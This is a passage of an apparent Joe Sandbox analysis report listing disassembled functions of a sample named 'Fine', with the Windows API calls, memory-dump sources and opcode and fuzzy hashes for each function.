                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b89048f41f038efb108a2b1c7e78779a57ec143f39d2482e530529fb99add6a2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0c3f605580ebe5ecaffd7167d63dd3a4ebc2ac0f4269f93030666d8c7af67644
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b89048f41f038efb108a2b1c7e78779a57ec143f39d2482e530529fb99add6a2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F03A71954348EFDB01AB68FD0EB2437A4A717709F044856B6099A1E2CFBA81688B41
                                                                                                                                                                                                                                                                                                                            Function 001DCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001DCEEE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e847f298e369578e25b872ddb9b78b5482544ebe047c0f1c37901860a5906e37
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8c2a416e8e44c99a8b0ef94ad5fec6597d0c63acc43ce8b1d66d2bb1099e97e2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e847f298e369578e25b872ddb9b78b5482544ebe047c0f1c37901860a5906e37
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A732F170A14216AFCB24CF98D884EBEBBB6EF55340F15845AE906AB351C770ED61CBD0
                                                                                                                                                                                                                                                                                                                            Function 00257AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 17cc1d77bcdaa9626f3b1d5cca3f57c492dfb2a62b345444b2dd1b113952b65e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0f9709cf7d3ba4b619fd4d2b783817f634ca487910c8b838082983e35e9d7e98
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17cc1d77bcdaa9626f3b1d5cca3f57c492dfb2a62b345444b2dd1b113952b65e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3D19A34E1420AEFCB14EF98D8819ADBBB5FF58310F14405AE815AB391DB30AE95CF94
                                                                                                                                                                                                                                                                                                                            Function 001FF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 665846f462ee8c94ef18b27a7933285bcd2ff338f18532229e44495cf49a58d0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 912bbe9da5ec9eba1788d7ec31002162eb2d480a058d52def26c1420da44c827
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 665846f462ee8c94ef18b27a7933285bcd2ff338f18532229e44495cf49a58d0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D51F875A0020CAFDB10DF68C844BB97BA2EF85364F19816CE9099B391D7B1ED43CB50
                                                                                                                                                                                                                                                                                                                            Function 0023FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0023FCCE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d8f5b373bc4a90e005c82f35f88093eec3b8c64711af74169538723531ea3d70
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dc000ea450c9cc8e5514c36a94ac07e2e8db063f119deaf79a4006cb3c740336
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8f5b373bc4a90e005c82f35f88093eec3b8c64711af74169538723531ea3d70
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741C3B290030AAFCB11DFA8D9849AEB7B8EF58314F21453FE512D7251EB70DA55CB50
                                                                                                                                                                                                                                                                                                                            Function 001D6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D664A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001D665C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D663E: FreeLibrary.KERNEL32(00000000,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D666E
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D66AB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6610
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001D6622
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D6607: FreeLibrary.KERNEL32(00000000,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6635
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d812d703b9c7ea48f9cbea9ea0fce0d741ae15bcfd26be1c0ecb9e32bbbf8163
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d08851e1784514c616bfb00f4e2553b0d75672ec5c18a58117342950aa5882cb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d812d703b9c7ea48f9cbea9ea0fce0d741ae15bcfd26be1c0ecb9e32bbbf8163
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5311E771600309AACF14AF20CC02BAD77E59F60710F10842FF542A62C2DFB1DA55DB50
                                                                                                                                                                                                                                                                                                                            Function 00208782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 25bee9c8edc5a778b59eb348474375823ced15ec79bfd6885f8ee5c64606d4ae
                                                                                                                                                                                                                                                                                                                            • Instruction ID: acd1af24c1b69e5ff0bbbf44546b2801c5319666c69b1aa0dcdef463fbfe95f9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25bee9c8edc5a778b59eb348474375823ced15ec79bfd6885f8ee5c64606d4ae
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2811187591420AAFCB05DF58E9459DB7BF4EF48310F114069F809AB352DA31EA21CB65
                                                                                                                                                                                                                                                                                                                            Function 00205373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00204FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0020319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00205031
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 002053DF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e1f283e852580edd10ba1a610fb183e40137e471cddb3ccfc1bacfd7aabb3b3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D60149B22103056BE331CF69D88695AFBEDEB85370F25061DF584832C1EB70A805CB74
                                                                                                                                                                                                                                                                                                                            Function 001FE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 547090b03e489d8ae51d9dad26aa204eca6bb1a5796555eb7821e77d07a5c8dd
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0F932510B2896D7313A2A9C05B7A32D99F42338F110716F661931E2DFB0D8128AF2
                                                                                                                                                                                                                                                                                                                            Function 0024F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0024F987
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ecef7a2cc9bd7046989fe238e2e66f8b0e72e655c5a686c343e7c401c051d930
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0c44f6d7f34be156806b68adc242d931b7d7350df46b278d984070b7e1fe0931
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecef7a2cc9bd7046989fe238e2e66f8b0e72e655c5a686c343e7c401c051d930
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F08C72A00208BFCB05EBA5DC4ADAE7BB8EF99720F004055F6059B361DB70EA50CB60
                                                                                                                                                                                                                                                                                                                            Function 00204FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0020319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00205031
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 139b95950fda74b382cd60d1f2f5bdb7a364408c75367e58d90dcc6531127759
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a8cf6aee8a6a749c79416d17a40fba9b11029236a1d2f453cacab37a1260db7f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 139b95950fda74b382cd60d1f2f5bdb7a364408c75367e58d90dcc6531127759
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0B436674F35A7DB311E269C05B6F375BAF557A0F148011B904970D2DBB0D8214EE0
                                                                                                                                                                                                                                                                                                                            Function 00203B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9cd88070e18e17c8ae4d3bfea33e2314a1b66dc305d7be1530c94b677007aa28
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 493b5b40001831bba354c9721ed3d92ed161676f5f9c5862747baf5fd43f2b48
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cd88070e18e17c8ae4d3bfea33e2314a1b66dc305d7be1530c94b677007aa28
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCE0E521630726A6DB20AE7A9C05B6A3A5CAF023ACF140160ED05964D2EFB0CD1081A0
                                                                                                                                                                                                                                                                                                                            Function 001D66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 98ca3f0d4799241941ba2254eace2d7fe88f48257d33b6c4b3c6c3099f6b3ab4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8ad2b0a1ea913fecc8617df067f1962bab478e3af1bccced85d6b92ce69724ac
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98ca3f0d4799241941ba2254eace2d7fe88f48257d33b6c4b3c6c3099f6b3ab4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFF06D75505766CFCB389F64D8A4866BBF4BF24329324897EE2DB86620C7719C80DF60
